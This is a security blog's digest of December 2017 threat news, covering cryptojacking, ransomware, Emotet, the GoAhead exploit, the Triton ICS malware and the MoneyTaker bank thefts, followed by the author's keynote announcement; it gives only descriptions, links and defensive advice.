Quickhits: Friday Dec 29 2017

2018 is wrapping up. Here are a couple things to watch over.

Bitcoin mining: Coinhive malware has been found on the Movistar website, who are a major telecom unit owned by telefonica in Spain. Cryptojackers are using Google Tag Manager to mine the bitcoin currency Monero on hi-jacked machines. Tag Manager enables marketers or anyone who has a website to create code that then lets them inject JavaScript snippets dynamically. So since it isn’t hard-coded in source files on a webserver, it doesn’t get detected. And affected users do not know these tags are serving up malware. But good news: most ad blockers and many A: tools can id and shutdown Coin Hive code.

http://www.zdnet.com/article/opera-just-added-a-bitcoin-mining-blocker-to-its-browser/

https://www.theregister.co.uk/2017/11/22/cryptojackers_google_tag_manager_coin_hive/

Ransomware Updates: Tastylock Cryptomix has been discovered by Michael Gillespie. It appends “.tastylock” as an extension to encrypted files and changes contact emails used by the ransomware.

Recommendations to protect your files: current, offline backups; malware detection software that looks for behavioural changes over signature detection; scan attachments before you open them using tools like VirusTotal.

Per Lawrence Abrams

https://www.bleepingcomputer.com/news/security/tastylock-cryptomix-ransomware-variant-released/

Quickhits: Thursday Dec 21 2017

Emotet Malware Sightings: Emotet originated as a banking trojan, and has continued to evolve into more pernicious malware.  It goes after banking credentials and sensitive information. Remember, data is the new gold.  Typically, the malware is conveyed via a malicious macro hidden in attachments that are very well disguised as legitimate business communications like invoices. Once Emotet is downloaded, it gets activated, goes looking for the data to harvest, and then exfiltrates that back to the command and control servers. This follows each step in the Cyber Kill Chain: Recon, Weaponize, Deliver, Exploit, Install, Command and control. Followed by Actions, meaning the attacker’s true intent. In this case, that can involve the sale of information and the continued spread of Emotet across systems to harvest more.

emotet

https://www.cylance.com/en_us/blog/threat-spotlight-emotet-infostealer-malware.html

GoAhead Remote Exploit:  This is a biggie. CVE-2017-17562: Remote LD_PRELOAD exploitation of GoAhead web server. Remote exploitation of anything isn’t good, but as it happens GoAhead runs a hell of a lot of things: printers, network gear, CC cameras. Users of telecoms hosting stuff. I took a look on Shodan to see how many connections there are and found over 400K.

goaheadserver

Per their website:

GoAhead is the world’s most popular, tiny embedded web server. It is compact, secure and simple to use. GoAhead is deployed in hundreds of millions of devices and is ideal for the smallest of embedded devices.

goahead1

Welcome to our security nightmare of convenience without proper configuration.  This isn’t something new, however. It’s been around awhile. And there is a patch here: https://www.elttam.com.au/blog/goahead/

Botnets and Bitcoins:  Bitcoin mining has become an issue, given the rapid rise in value of this volatile commodity.  Because it takes so much energy to produce this intangible product, miners resort to harnessing other people’s equipment through sketchy downloads not from the Apple or Google playstores, via keyloggers through malware, and via botnets. At the moment, organized cybercrime is going after database services using a new botnet in the “Hex-Men” attacks.  These are based out of China, and the reach is global. Why you should care: according to GuardiCore researcher Daniel Goldberg, these boxes are sensitive production Web servers, running MS SQL, ElasticSearch etc. Daniel has co-authored a report for GuardiCore on this with Ofri Ziv, who warns:

The fact that they are targeting databases is pretty amazing to me and it’s something that people need to really, really pay more attention to

https://www.darkreading.com/attacks-breaches/new-database-botnet-leveraged-for-bitcoin-mining/d/d-id/1330674

https://www.guardicore.com/2017/12/beware-the-hex-men/

Quickhits: Tuesday Dec. 19 2018

Lexmark Printers: Well this can’t be good. Apparently there are over a thousand Lexmark printers ready for the taking, due to misconfiguration. They are sitting open and acessible on public internet. Researchers from Newsky Security reported finding these printers in businesses, universities and government offices. These printers have no passwords.  Which makes them easy pickings for a variety of attacks. A remote attackers can

” view the printer’s firmware version, ink levels, and network configuration that allows them to enable proxies, change administrator passwords, modify sound volume, contact information, device status, time, and date, create a self-signed certificate and private key and even upload documents and send jobs to the printer.”

Android Malware:  We know Android is the choice of attackers everywhere. Recommendations to purchase appas solely through Google Playstore don’t guarantee safety, but at least they lower the odds of infection. Now there’s anew trojan in town. Loapi hides behind adult content sites or antivirus solutions. The trojan forces users into a loop seeking device admin istrator privileges. It’s also equipped to defend itself against removal and blocks attempts.  According to Kaspersky, the malware creators

“have implemented almost the entire spectrum of techniques for attacking devices: the Trojan can subscribe users to paid services, send SMS messages to any number, generate traffic and make money from showing advertisements, use the computing power of a device to mine cryptocurrencies, as well as perform a variety of actions on the internet on behalf of the user/device. The only thing missing is user espionage, but the modular architecture of this Trojan means it’s possible to add this sort of functionality at any time.”

Quickhits: Monday Dec 18 2018

New attack on Apache Struts: We’ve seen patches issued in March, May and agin this fall for exploits against vulnerabilities in this widespread open source web development  framework used to build JAVA web applications. In this report by F5 labs,  a sophisticated new campaign, “Zealot”, is leveraging ShadowBroker exploits EternalBlue and EternalSynergy.  Zealot is described as a “highly obfuscated and multi-staged attack”, in keeping with these exploits, and utilizes Powershell in Windows attacks, and Python in Linux attacks. Zealot mines the cryptocurrency Moneris, popular amongst cybercriminals.

Potential for Uptick in Iranian-based attacks:  The nuclear deal between Iran and the US seems tenuous at best. There is growing concern that should Trump end things, there will be a corresponding response from Iranian-based hackers. Iranian attacks are state-sponsored, so these won’t be cybercrime cash-grabs, but targeted espionage or worse, damaging attacks against infrastructure, like Shamoon wiperware. And since the attackers do the recon well in advance of the big event, I’d be watching IP addresses and any data exfil carefully.

Banking Trojan Emotet:  There is an increase in banking trojan activity. Malware hunters are sharing reports on new activity for Emotet, which made a resurgence in July this year.  A dedicated group of researchers has been steadily updating and sharing their findings on Pastebin here. 

VirusBulletin and Critical Flaws:  VirusBulletin is a very widely used forum for security analysts to test and share malware or suspect findings. Two researchers claim there are unpatched critical flaws that have yet to be remediated and that VirusBulletin has been advised.

 

 

 

 

 

Quickhits: Thursday Dec 14 2018

Attacks on ICS:  FireEye has identified a new targeted attack on ICS. “Triton” is designed to cause physically damage and harm operations. Thanksfully, this latest attack failed, but the lessons and warning are huge. Consider the implications of this against water ppurification plants; nublear power plants; major processing plants that cannot sustain downtime. Triton goes after the SIS or safety implemented system controllers. The FIreEye report describes the malware as follows:

TRITON is one of a limited number of publicly identified malicious software families targeted at industrial control systems (ICS). It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016. TRITON is consistent with these attacks, in that it could prevent safety mechanisms from executing their intended function, resulting in a physical consequence.

 

While FireEye cannot attribute the actor, they suggest with some certainty this is the act of a nationstate, they back it up with this statement:

The attacker targeted the SIS suggesting an interest in causing a high-impact attack with physical consequences. This is an attack objective not typically seen from cyber-crime groups.

New Banking APT:  The discovery of a new long term attack on banks was revealed this week.  Dubbed “MoneyTaker”, a report issued by Group-IB Security  details how the group has taken over $11 million across 18 months from over 20 targets in the UK, Russia and US, including banks and legal firms. Dmitry Volkov, co-founder of Group-IB and head of intelligence, stated:

“MoneyTaker uses publicly available tools, which makes the attribution and investigation process a non-trivial exercise,” says. “In addition, incidents occur in different regions worldwide and at least one of the US Banks targeted had documents successfully exfiltrated from their networks, twice. Group-IB specialists expect new thefts in the near future.”

The twist here is that MoneyTaker is leveraging pentesting tools like Metasploit, NirCmd, psexec, Mimikatz, Powershell Empire. They used PSExec to propogate across the network, per The Hackernews.   The article reports they are also using Citadel and Kronos banking trojans to deliver a specific point of sale or POS malware known as ScanPOS.

The group has been targetting card processing systems, like the Russian Interbank System AWS CBR and SWIFT which prompted Group-IB to warn that Latin America is a tempting target because of their broad use of STAR. I’ll be writing more about this as a separate piece. Stay tuned.

My First Keynote: Lookout S(h)ecurity Bootcamp Toronto

Lookout Security in Toronto is hosting an exciting event on January 12 2018 for women who are interested in  cybersecurity, and currently in the tech field.  I am honoured to have been asked to be the keynote speaker at this event. This will be my first keynote! I love that this happens with something I really care about: encouraging women in tech, specifically in cybersecurity.

This is what it’s all about.  Encourage learning, growth and opportunity. Events like these grow far beyond the one day they are held, as I can attest from my work with The Diana Initiative. Friendships form, bonds are made, contacts and networking happen. It’s all good!

This is going to be a fantastic and fun day of learning. You had me at reverse engineering! What a great opportunity. Thank you Lookout!